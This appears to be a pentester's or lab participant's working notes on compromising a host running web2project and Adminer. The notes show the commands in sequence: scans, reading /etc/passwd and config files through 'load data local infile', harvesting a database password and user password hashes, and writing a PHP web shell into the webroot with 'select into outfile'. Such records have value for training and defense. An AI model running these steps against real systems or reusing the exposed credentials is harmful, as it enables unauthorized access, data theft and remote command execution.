MCO: 44

regular nmap:

Discovered open port 3306/tcp on 172.16.10.44
Discovered open port 80/tcp on 172.16.10.44
Discovered open port 22/tcp on 172.16.10.44

mysql -u admin -p -h 172.16.10.44
Enter password: 
ERROR 1130 (HY000): Host '172.16.10.250' is not allowed to connect to this MariaDB server

web2project

Version 3.3.66

sqlmap says login post has no injectable parameters.

nikto found phpmyadmin / adminer 4.6.2

default creds for phpmyadmin aren’t working:

mysql> CREATE DATABASE web2project;
Query OK, 1 row affected (0.00 sec)
mysql> GRANT INSERT, DELETE, UPDATE, SELECT ON web2project.* TO 'w2puser'@'localhost' IDENTIFIED BY 'sillyboy25';
Query OK, 0 rows affected (0.02 sec)
mysql> exit

Access denied for user 'w2puser'@'localhost' (using password: YES)

found .gitignore file:

/includes/*config.php
/reporting.tmp
/tmp.*
/unit_tests/reports/
/.idea/
/files/*
/docs/*
vendor/**

tests/reports/**

promising:

https://www.immuniweb.com/advisory/HTB23213

phpmyadmin:

load data local infile '/etc/passwd'
into table admirer.ferm1
fields terminated by "\n"

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
rsauns-adm:x:1000:1000:,,,:/home/rsauns-adm:/bin/bash

Error in query (7890): Can't find file '/home/rsauns-adm/.ssh/id_rsa'.
Error in query (7890): Can't find file '/var/www/html/web2project-version3.3.66/index.php'.
Error in query (7890): Can't find file '/var/www/html/web2project-version3.3/index.php'.

fuckin’ hell, this worked: (how did i know this would work the last time?)

load data local infile '../index.php'
into table admirer.ferm1
fields terminated by "\n"

but still, no creds.

finally found it in ../includes/config.php

$w2Pconfig['dbtype'] = 'mysqli'; // ONLY MySQL is supported at present
 edit	$w2Pconfig['dbchar'] = 'utf8'; // The character set used in the database
 edit	$w2Pconfig['dbhost'] = 'localhost';
 edit	$w2Pconfig['dbname'] = 'web2'; // Your web2Project Database Name
 edit	$w2Pconfig['dbuser'] = 'web2_user'; // Your MySQL Username
 edit	$w2Pconfig['dbpass'] = 'QYfkvLtaBeAXVtBnVyANgWV9'; // Your MySQL Password

1	1	admin	$2y$10$oNAP8HNktAqXfiSV34knS.1sYggex7Q55iU3NNMAvRhYPRcpmPJzK	0	1	 	0	0	0
2	2	web2_user	$2y$10$GzuN16/D9nJ4svXVs5kyWOMu3aLitzbNKePA8BrHGTxshWxw3fXNe	0	0	 	0	0	0
3	3	wadler	bf3dcca194bf716891d2357827af25af	0	0	 	0	0	0
4	4	rsauns	c5eb3cd54b9988df058d71aa166bbd5d	0	0	NULL	0	0	0
5	5	thudson	932405c12fb8cb3c83cc4fcb9bae0fb8	0	0	NULL	0	0	0
6	6	trivera	fa03b70cec2588dab70bb68fe4a73b47

created table ‘wow’ with column ‘wow’, inserted value <?php system($_REQUEST['cmd']);?> into wow.wow loaded file into ‘/var/www/html/wow.php’ … but that’s really not the webroot.

eh.. so i just grabbed the hash from /var/www/hash.txt

trying to get shell

Error in query (7890): Can't find file '/var/www/index.php'.
Error in query (7890): Can't find file '/var/www/web2project/index.php'. 
Error in query (7890): Can't find file '/var/www/web2project-3.3/index.php'. 
Error in query (7890): Can't find file '/var/www/web2project-version3.3/index.php'.
Error in query (7890): Can't find file '/var/www/web2project-version-3.3/index.php'.
Error in query (7890): Can't find file '/var/www/web2project-version-3.3.66/index.php'.
Error in query (7890): Can't find file '/var/www/web2project-3.3.66/index.php'.
Error in query (7890): Can't find file '/var/www/web2project-version3.3.66/index.php'. 

from /etc/apache2/apache2.conf

<Directory />
 edit		Options FollowSymLinks
 edit		AllowOverride None
 edit		Require all denied
 edit	</Directory>
 edit	 
 edit	<Directory /usr/share>
 edit		AllowOverride None
 edit		Require all granted
 edit	</Directory>
 edit	 
 edit	<Directory /var/www/>
 edit		Options Indexes FollowSymLinks
 edit		AllowOverride None
 edit		Require all granted
 edit	</Directory>
 edit	 
 edit	#<Directory /srv/>
 edit	#	Options Indexes FollowSymLinks
 edit	#	AllowOverride None
 edit	#	Require all granted
 edit	#</Directory>

from /etc/apache2/sites-available/000-default.conf

ServerAdmin webmaster@localhost
 edit		DocumentRoot /var/www/html

from /etc/apache2/sites-enabled/000-default.conf

ServerAdmin webmaster@localhost
 edit		DocumentRoot /var/www/html/todo

…yep, found it.

created table forum_user with column ‘wow’, inserted value <?php system($_REQUEST['cmd']);?> into forum_user

insert into `forum_user`(wow) values("<?php system($_REQUEST['cmd']);?>");

loaded into ‘/var/www/html/todo/wow.php’

select wow into outfile '/var/www/html/todo/wow.php' from forum_user;

didn’t get a shell back but meh, just matter of time.